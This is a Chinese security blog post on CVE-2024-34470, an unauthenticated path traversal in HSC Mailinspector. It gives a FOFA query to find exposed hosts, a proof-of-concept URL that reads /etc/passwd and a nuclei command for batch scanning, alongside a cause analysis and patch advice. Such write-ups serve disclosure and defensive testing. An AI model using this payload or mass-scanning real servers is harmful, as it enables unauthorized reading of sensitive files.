#渗透测试#批量漏洞挖掘#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

免责声明 本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。

目录

[HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)](#HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470))

0x01漏洞概述

0x02漏洞复现

0x03漏洞分析

0x04修复建议

HSC Mailinspector 任意文件读取漏洞(CVE-2024-34470)

0x01漏洞概述

HSC Mailinspector 是一种邮件安全解决方案,旨在保护企业和组织免受各种电子邮件威胁的影响。它提供了一系列功能,包括针对垃圾邮件、恶意软件、垃圾邮件和其他网络威胁的过滤和检测。

在 HSC Mailinspector 的 5.2.17-3 版本到 5.2.18 版本之间发现了一个问题。在 /public/loader.php 文件中存在一个未经身份验证的路径遍历漏洞。path参数没有正确过滤传递的文件和目录是否属于 Web 根目录,这使得攻击者能够读取服务器上的任意文件。

受影响版本

HSC Mailinspector : 5.2.17-3<=version<=5.2.18受影响。

CVE编号

CVE-2024-34470

0x02漏洞复现

fofa

body="mailinspector/public"

1.poc

https://target-IP/mailinspector/public/loader.php?path=../../../../../../../etc/passwd

构造如上payload,将target-IP替换成目的IP,在浏览器或burp中打开,即可查看目标系统的文件。

2.批量检测poc

使用nuclei,下载地址:

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34470.yaml

使用命令,nuclei.exe -t CVE-2024-34470.yaml -l 1.txt

0x03漏洞分析

这个漏洞的成因是在/public/loader.php文件中存在path参数没有正确过滤传递的文件和目录是否属于网络根目录,从而允许攻击者读取服务器上的任意文件。

0x04修复建议

1.目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://hsclabs.com/mailinspector/

2.限制用户权限,避免授予过高的权限。

3.实施严格的访问控制和身份验证机制,以防止未经授权的访问

相关推荐
jiayong232 分钟前
Vue2 与 Vue3 常见面试题精选 - 综合宝典
前端·vue.js·面试
liux35287 分钟前
Kafka 4.1.1 部署指南:单机版与安全认证配置
安全·kafka·linq
Deepoch17 分钟前
Deepoc具身模型:让无人机成为“跨场景任务的智能协同枢纽”
科技·无人机·具身模型·deepoc·具身模型开发板·无人机爱好者
周某人姓周22 分钟前
DOM型XSS案例
前端·安全·web安全·网络安全·xss
j_xxx404_23 分钟前
Linux:自主shell命令行解释器附源码
linux·运维·服务器
开开心心就好1 小时前
开源免费高速看图工具,支持漫画大图秒开
linux·运维·服务器·安全·ruby·symfony·1024程序员节
花间相见1 小时前
【AI开发】—— Ubuntu系统使用nvm管理Node.js多版本,版本切换一键搞定(实操完整版)
linux·ubuntu·node.js
PPPPPaPeR.1 小时前
从零实现一个简易 Shell:理解 Linux 进程与命令执行
linux·开发语言·c++
泰迪智能科技1 小时前
师资培训分享丨大模型与智能体教学应用实战线下广州班莅临泰迪智能科技参观调研
人工智能·科技
上海云盾第一敬业销售1 小时前
游戏盾在保障游戏安全方面的独特优势
网络·安全·游戏